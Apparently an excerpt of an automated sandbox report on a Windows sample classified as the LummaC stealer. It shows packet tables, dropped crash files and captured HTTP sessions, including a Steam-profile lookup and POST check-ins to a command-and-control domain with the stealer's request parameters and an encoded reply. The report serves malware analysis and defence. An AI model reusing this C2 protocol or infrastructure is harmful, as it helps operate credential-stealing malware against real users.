Dec 27, 2024 14:43:13.477514029 CET	443	63023	172.64.41.3	192.168.2.4
Dec 27, 2024 14:43:13.480752945 CET	63023	443	192.168.2.4	172.64.41.3
Dec 27, 2024 14:43:13.481195927 CET	63023	443	192.168.2.4	172.64.41.3
Dec 27, 2024 14:43:13.484944105 CET	443	63023	172.64.41.3	192.168.2.4
Dec 27, 2024 14:43:13.804037094 CET	443	63023	172.64.41.3	192.168.2.4
Dec 27, 2024 14:43:13.889221907 CET	63023	443	192.168.2.4	172.64.41.3
Dec 27, 2024 14:43:23.700361013 CET	57901	53	192.168.2.4	1.1.1.1
Dec 27, 2024 14:43:24.374506950 CET	63151	443	192.168.2.4	162.159.61.3
Dec 27, 2024 14:43:24.374726057 CET	63151	443	192.168.2.4	162.159.61.3
Dec 27, 2024 14:43:24.689532042 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:24.692015886 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:24.702716112 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:24.832473040 CET	63151	443	192.168.2.4	162.159.61.3
Dec 27, 2024 14:43:53.617321968 CET	63151	443	192.168.2.4	162.159.61.3
Dec 27, 2024 14:43:53.931366920 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:53.984205961 CET	53	58798	1.1.1.1	192.168.2.4
Dec 27, 2024 14:43:54.816234112 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:56.419945955 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:56.419958115 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:59.737199068 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:43:59.737207890 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:44:06.376132965 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:44:06.376156092 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:44:19.699238062 CET	443	63151	162.159.61.3	192.168.2.4
Dec 27, 2024 14:44:19.699258089 CET	443	63151	162.159.61.3	192.168.2.4

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 27, 2024 14:43:02.085902929 CET	192.168.2.4	1.1.1.1	c24a	(Port unreachable)	Destination Unreachable
Dec 27, 2024 14:43:53.931430101 CET	192.168.2.4	162.159.61.3	9f85	(Port unreachable)	Destination Unreachable
Dec 27, 2024 14:43:54.816318035 CET	192.168.2.4	162.159.61.3	9f80	(Port unreachable)	Destination Unreachable
Dec 27, 2024 14:43:56.420006037 CET	192.168.2.4	162.159.61.3	9f80	(Port unreachable)	Destination Unreachable
Dec 27, 2024 14:43:59.737255096 CET	192.168.2.4	162.159.61.3	9f80	(Port unreachable)	Destination Unreachable
Dec 27, 2024 14:44:06.376195908 CET	192.168.2.4	162.159.61.3	9f80	(Port unreachable)	Destination Unreachable
Dec 27, 2024 14:44:19.699290037 CET	192.168.2.4	162.159.61.3	9f80	(Port unreachable)	Destination Unreachable

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 14:42:44.826339006 CET	187	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3 Host: gamertool.eu Cache-Control: no-cache
Dec 27, 2024 14:42:45.995945930 CET	1012	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 27 Dec 2024 13:42:45 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 27 Dec 2024 14:42:45 GMT Location: https://gamertool.eu/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5vqiT4bzeeSWQV5PPi%2BBTXsf7lXSVvydZ3%2BJUTqsK7jVPZJBH0uCpAlm4LtGrAxDDuneRA%2BHOSmFqG8ST8O9eBffAZOLyU4d3f2taRVc5rntcebYihuYHYg8DKUoQ2A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89bc585c4743c4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1516&min_rtt=1516&rtt_var=758&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=187&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 14:42:51.193537951 CET	187	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3 Host: gamertool.eu Cache-Control: no-cache
Dec 27, 2024 14:42:52.336080074 CET	1011	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 27 Dec 2024 13:42:52 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 27 Dec 2024 14:42:52 GMT Location: https://gamertool.eu/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H7wHLfOqzUWe0vXfZFiNEkYDy12rY6Ijpq912Nd2eeAntfQ2lg8B8TzkjSAqdGUvewKzdY6hVxBZ4kETmF8k7nU78OJ3jhKdtSlx7oBGm78THcZtmmr%2Buo%2BxkCeS37A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89bc7ffd71c470-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1707&min_rtt=1707&rtt_var=853&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=187&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 14:43:13.025182962 CET	187	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3 Host: gamertool.eu Cache-Control: no-cache
Dec 27, 2024 14:43:14.211298943 CET	1019	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 27 Dec 2024 13:43:14 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 27 Dec 2024 14:43:14 GMT Location: https://gamertool.eu/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XKY2aztKw5wOdEfky5EqUIFkoN0Tle%2BEXI7N%2FBI2%2Fgn3%2BNqfbjCRXRrx3dSspoHuWyqFYd1svU%2BgrzqotFWpd5b8NEMfeH4phKGvZUPc8wg0VoZa2EmYP7NU%2B1HKQE0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89bd08ba5c7d05-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1914&min_rtt=1914&rtt_var=957&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=187&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 14:43:43.599646091 CET	187	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3 Host: gamertool.eu Cache-Control: no-cache
Dec 27, 2024 14:43:44.727601051 CET	1017	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 27 Dec 2024 13:43:44 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 27 Dec 2024 14:43:44 GMT Location: https://gamertool.eu/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pbeDCWuBJTJ4uI7fYHODx91kksiov1qXnxKniy%2B6S%2BKF2c50hU0aUSeB%2BNurQ5bsNUi%2FYPxizEMD5BPrNKOnEW4GGDvmWZyLXvbTyR7pAz%2F4SCX3ALbhpnezlfuOf40%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89bdc76bcf43d4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1600&rtt_var=800&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=187&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report T4qO1i2Jav.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VBJU2N3euXB4jMxu_15788e3c6243c8ecfbcf678a99c63be7a7dd82a_474ed555_4c19eb69-d447-4027-bd46-aabba6de0aff\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VBJU2N3euXB4jMxu_5c7491f6deea1970ac49fbc8a7eacec4b8459a4_474ed555_510640a1-9cb9-4f90-a18e-88cd0b8e1d9e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER42A4.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER44E7.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4517.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB505.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB99A.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9CA.tmp.xml

C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\152c595e-f1ce-44fd-80e1-14e6b901932c.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1a881c7d-defd-4480-ae5f-b5d270c6c7af.tmp

Windows Analysis Report
T4qO1i2Jav.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 14:44:17.332580090 CET	187	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3 Host: gamertool.eu Cache-Control: no-cache
Dec 27, 2024 14:44:19.061876059 CET	1021	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 27 Dec 2024 13:44:18 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 27 Dec 2024 14:44:18 GMT Location: https://gamertool.eu/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cJE6JRILOJNL5S0OFz%2BDfXYNFUr8nKprBpWga7JcBycEAmCfNYS%2BkVtMzERS5CLRUHs2i7DR18xSKK%2BFQ75narN89qE3ecElIzRq378e7LIYM%2BD3TrIHwMmZvGfNnZI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89be9d5f9f425c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=127761&min_rtt=127761&rtt_var=63880&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=187&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:42:11 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-27 13:42:12 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 27 Dec 2024 13:42:12 GMT Content-Length: 35121 Connection: close Set-Cookie: sessionid=b6e631875b4c3e6a053e51c0; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-27 13:42:12 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-27 13:42:12 UTC	10097	IN	Data Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09 Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-27 13:42:12 UTC	10545	IN	Data Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 Data Ascii: NIVERSE":"public","LANGUAGE":"english","COUNTRY":"US","MEDIA_CDN_COMMUNITY_URL":"https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/","MEDIA_CDN_URL":"htt

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:42:14 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: lev-tolstoi.com
2024-12-27 13:42:14 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-27 13:42:15 UTC	1117	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:42:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=epioc39n862pf76c0p7fl1atbf; expires=Tue, 22 Apr 2025 07:28:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=keyIp8MfAPbGuPTeEsKahaObUCi8wL96EhMNuC86YZOqocmtUiCjXOBVeVX4ioA8CwMj3k94DJieaZYPJOQV5GYB6GHAbGlvvI0jkwi1k2y0Rn4sLQrPZYK25buBAkItK78%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89bb953d23429a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2482&min_rtt=2477&rtt_var=939&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1158730&cwnd=237&unsent_bytes=0&cid=1c820b527be53405&ts=785&x=0"
2024-12-27 13:42:15 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-27 13:42:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:42:16 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: lev-tolstoi.com
2024-12-27 13:42:16 UTC	49	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 76 6f 69 64 65 65 64 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--voideed&j=
2024-12-27 13:42:17 UTC	1121	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:42:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=orop84pp4prpjkiklf2o43r18s; expires=Tue, 22 Apr 2025 07:28:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jfp2Q9k6RpLDh5ESGUZScIoGanHPCnMejqvE5LVx95KmRjIFmefHJUn6fp8GSYIZOGcJr9Fm6LVN0DIiTWRzH%2Fa33FJvo7qp08DRCz50jaq8mZO2XltI8euG%2BjnLImrnYHQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89bba22d5ff793-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1490&min_rtt=1479&rtt_var=577&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=948&delivery_rate=1862244&cwnd=152&unsent_bytes=0&cid=4e5b7d977995b49f&ts=780&x=0"
2024-12-27 13:42:17 UTC	248	IN	Data Raw: 34 39 31 63 0d 0a 58 32 55 59 59 42 5a 53 39 46 32 31 58 50 51 52 32 75 4d 42 7a 66 53 75 5a 52 65 33 65 41 39 59 37 2b 56 32 78 4b 4f 32 2b 5a 73 6b 52 32 35 43 4c 47 62 59 66 38 59 35 31 69 75 75 6b 58 53 6f 32 49 77 45 63 35 56 43 61 54 6d 44 6c 68 50 6f 67 63 43 55 75 57 55 44 65 51 78 6c 4e 39 68 2f 30 43 54 57 4b 34 47 59 49 36 69 61 6a 46 38 31 30 68 4a 74 4f 59 4f 48 46 36 2f 4d 78 70 58 34 4e 77 6c 2f 43 48 4d 78 6b 44 7a 5a 4d 5a 46 30 76 34 4a 72 6f 35 33 44 44 58 71 56 56 43 30 39 6c 63 64 4d 35 75 37 54 6a 66 6f 53 42 47 73 4c 4e 43 2f 59 4a 70 63 35 6d 6a 50 67 77 57 43 6f 6c 73 49 44 63 39 77 51 5a 7a 43 4c 68 68 4b 75 30 39 2b 66 38 7a 63 48 66 41 6c 35 4f 49 51 78 30 7a 61 61 63 72 57 43 49 2b 48 57 79 78 38 31 6a 56 Data Ascii: 